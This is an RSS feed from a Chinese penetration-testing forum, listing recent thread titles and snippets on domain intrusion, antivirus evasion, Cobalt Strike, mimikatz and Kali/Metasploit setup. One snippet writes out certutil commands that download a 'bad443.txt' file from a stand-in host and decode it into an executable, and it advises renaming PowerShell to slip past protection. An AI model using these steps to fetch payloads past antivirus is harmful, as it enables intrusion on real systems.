<br />
<b>Deprecated</b>:  mysql_escape_string(): This function is deprecated; use mysql_real_escape_string() instead. in <b>/www/wwwroot/www.cobjon.com/source/class/discuz/discuz_database.php</b> on line <b>177</b><br />
<?xml version="1.0" encoding="gbk"?>
<rss version="2.0">
  <channel>
    <title>中国网络渗透测试联盟 - 网络渗透测试::『Network penetration testing』</title>
    <link>https://cobjon.com/forum-73-1.html</link>
    <description>Latest 20 threads of 网络渗透测试::『Network penetration testing』</description>
    <copyright>Copyright(C) 中国网络渗透测试联盟</copyright>
    <generator>Discuz! Board by Comsenz Inc.</generator>
    <lastBuildDate>Sat, 16 May 2026 00:41:26 +0000</lastBuildDate>
    <ttl>60</ttl>
    <image>
      <url>https://cobjon.com/static/image/common/logo_88_31.gif</url>
      <title>中国网络渗透测试联盟</title>
      <link>https://cobjon.com/</link>
    </image>
    <item>
      <title>我们都老out了之绕过添加计划任务360卫士拦截并隐藏计划任务</title>
      <link>https://cobjon.com/thread-1547-1-1.html</link>
      <description><![CDATA[Windows计划任务的进阶


]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
<enclosure url="/forum/文章正文


" length="


本文阐述Windows计划任务在系统中的隐藏方式及工具化的转换。


" type="image/jpeg" />      <pubDate>Mon, 01 Apr 2024 14:58:59 +0000</pubDate>
    </item>
    <item>
      <title>原创---渗透测试某大型企业内网（域渗透、核心交换机）</title>
      <link>https://cobjon.com/thread-1533-1-1.html</link>
      <description><![CDATA[1、弱口令扫描提权进服务器


]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
<enclosure url="/forum/ 
" length="
" type="image/jpeg" />      <pubDate>Fri, 05 Jan 2024 16:23:31 +0000</pubDate>
    </item>
    <item>
      <title>BadUSB简单免杀一秒上线CobaltStrike</title>
      <link>https://cobjon.com/thread-1528-1-1.html</link>
      <description><![CDATA[]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Tue, 28 Nov 2023 11:57:11 +0000</pubDate>
    </item>
    <item>
      <title>原创---日常生活中的apt攻击实例演示</title>
      <link>https://cobjon.com/thread-1527-1-1.html</link>
      <description><![CDATA[]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Tue, 28 Nov 2023 11:38:58 +0000</pubDate>
    </item>
    <item>
      <title>域渗透技能大全</title>
      <link>https://cobjon.com/thread-1493-1-1.html</link>
      <description><![CDATA[&amp;nbsp; 
]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
<enclosure url="https://cobjon.com/data/attachment/forum/
" length="" type="image/jpeg" />      <pubDate>Wed, 30 Mar 2022 18:08:22 +0000</pubDate>
    </item>
    <item>
      <title>渗透之绕过杀软下载</title>
      <link>https://cobjon.com/thread-1488-1-1.html</link>
      <description><![CDATA[[md]certutil -encode 443.exe 443.txt

certutil.exe -urlcache -split -f \&quot;https://1.com/bad443.txt\&quot; 443.txt

certutil -decode 443.txt 443.exe

将powershell copy为别的名字到别的目录然后再执行即可绕过防护下载

curl url -o /tmp绕过杀软
[/md]]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Wed, 30 Mar 2022 17:56:49 +0000</pubDate>
    </item>
    <item>
      <title>完整的内网域渗透</title>
      <link>https://cobjon.com/thread-1487-1-1.html</link>
      <description><![CDATA[完整的内网域渗透 


]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
<enclosure url="/forum/ TOC \\o &quot;1-3&quot; \\h \\z %u 1. 环境介绍...................................... ..." length="" type="image/jpeg" />      <pubDate>Wed, 30 Mar 2022 17:48:18 +0000</pubDate>
    </item>
    <item>
      <title>CVE-2018-14665（linux全版本x.org提权漏洞）</title>
      <link>https://cobjon.com/thread-1438-1-1.html</link>
      <description><![CDATA[印度安全研究员Narendra Shinde在X.Org Server软件包中发现了一个普通账号提权root的高危漏洞（CVE-2018-14665），它影响了主要的Linux发行版，包括OpenBSD，Debian，Ubuntu，CentOS，Red Hat和Fedora。


]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Mon, 29 Oct 2018 09:32:50 +0000</pubDate>
    </item>
    <item>
      <title>免杀工具下载</title>
      <link>https://cobjon.com/thread-1419-1-1.html</link>
      <description><![CDATA[https://github.com/tiagorlampert/CHAOS]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Sat, 02 Jun 2018 13:04:21 +0000</pubDate>
    </item>
    <item>
      <title>2018 pentestbox update all出错解决方法</title>
      <link>https://cobjon.com/thread-1416-1-1.html</link>
      <description><![CDATA[update all以后执行gem install bundle
gem install bundler两条命令以后执行一下补bundle install]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Mon, 30 Apr 2018 07:13:55 +0000</pubDate>
    </item>
    <item>
      <title>华为USG防火墙配置ssh&amp;telnet方法（支持5500）</title>
      <link>https://cobjon.com/thread-1415-1-1.html</link>
      <description><![CDATA[[*]配置允许远程接入设备的用户IP地址。不在ACL范围内的网段将不能对设备进行Telnet和SSH方式的远程访问。
system-view[sysname] acl 2000[sysname-acl-basic-2000] rule permit source x.x.x.x x.x.x.x[sysname-acl-basic-2000] quitx.x.x.x x.x.x.x为允许远程接入 ...]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Tue, 10 Apr 2018 07:04:00 +0000</pubDate>
    </item>
    <item>
      <title>两行代码改造法国神器mimikatz执行就获取明文密码</title>
      <link>https://cobjon.com/thread-1414-1-1.html</link>
      <description><![CDATA[]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Mon, 02 Apr 2018 11:01:28 +0000</pubDate>
    </item>
    <item>
      <title>linux系统定期执行清除缓存的命令</title>
      <link>https://cobjon.com/thread-1395-1-1.html</link>
      <description><![CDATA[1 先写一个脚本存为一个文件，比如 clearmem.sh
#!/bin/bash
sync
echo 3 &gt; /proc/sys/vm/drop_caches
2  然后给这个脚本加一个可执行权限
chmod +x chearmem.sh
3  先试试运行一下看看内存释放没有，free -m
sh clearmem.sh
free -m
4  最后创建一个计划任务 ...]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Wed, 21 Jun 2017 08:21:25 +0000</pubDate>
    </item>
    <item>
      <title>pentestbox更新metasploit失败解决方法</title>
      <link>https://cobjon.com/thread-1392-1-1.html</link>
      <description><![CDATA[1、PentestBox update 出错修复 2、更新msf出错 解决办法：
gem sources -r https://rubygems.org/  ##移除默认源gem sources -a http://rubygems.org/   ##新增源或者将以上2条命令合并会一条：gem sources --add http://rubygems.org/ --remove https://rubygems.org ...]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Sat, 10 Jun 2017 09:45:27 +0000</pubDate>
    </item>
    <item>
      <title>pentest启动msfconsole爆错解决方法</title>
      <link>https://cobjon.com/thread-1391-1-1.html</link>
      <description><![CDATA[All right, there is a good news, I solve it.It doesn\'t matter with your path or folder name.
I still don\'t know where is the bug comes from, but I solve it.
Follow with my steps.
1. If you run msfconsole or any MSF function, it said \&quot;Metasploit re .]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Sat, 10 Jun 2017 08:14:22 +0000</pubDate>
    </item>
    <item>
      <title>centos各版本自启动服务命令及kali linux启动</title>
      <link>https://cobjon.com/thread-1390-1-1.html</link>
      <description><![CDATA[低版本                                            高版本
使某服务自动启动]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
<enclosure url="/forum/systemctl enable httpd.service
使某服务不自动启动" length="chkconfig --level 3 httpd off" type="image/jpeg" />      <pubDate>Wed, 07 Jun 2017 08:18:59 +0000</pubDate>
    </item>
    <item>
      <title>图片后门捆绑利用工具 – FakeImageExploiter</title>
      <link>https://cobjon.com/thread-1387-1-1.html</link>
      <description><![CDATA[http://www.freebuf.com/sectool/134077.html]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Fri, 12 May 2017 01:16:42 +0000</pubDate>
    </item>
    <item>
      <title>Powershell-Payload-Excel-DeliveryMacroCode</title>
      <link>https://cobjon.com/thread-1385-1-1.html</link>
      <description><![CDATA[]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Sat, 01 Apr 2017 02:43:04 +0000</pubDate>
    </item>
    <item>
      <title>kali linux2.0 msf连接不上数据库解决办法</title>
      <link>https://cobjon.com/thread-1383-1-1.html</link>
      <description><![CDATA[kali 2.0 已经没有metasploit 这个服务了，所以service metasploit start 的方式不起作用。
在kali 2.0中启动带数据库支持的MSF方式如下：
#1  首先启动postgresql数据库：/etc/init.d/postgresql start；或者 service postgresql start；
#2  初始化MSF数据库（关键 ...]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Mon, 27 Mar 2017 11:48:02 +0000</pubDate>
    </item>
    <item>
      <title>kali linux2.0 rolling版官方源与国内源</title>
      <link>https://cobjon.com/thread-1381-1-1.html</link>
      <description><![CDATA[#kali官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
#中科大的源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib]]></description>
      <category>网络渗透测试::『Network penetration testing』</category>
      <author>admin</author>
      <pubDate>Fri, 17 Mar 2017 13:08:13 +0000</pubDate>
    </item>
  </channel>
</rss>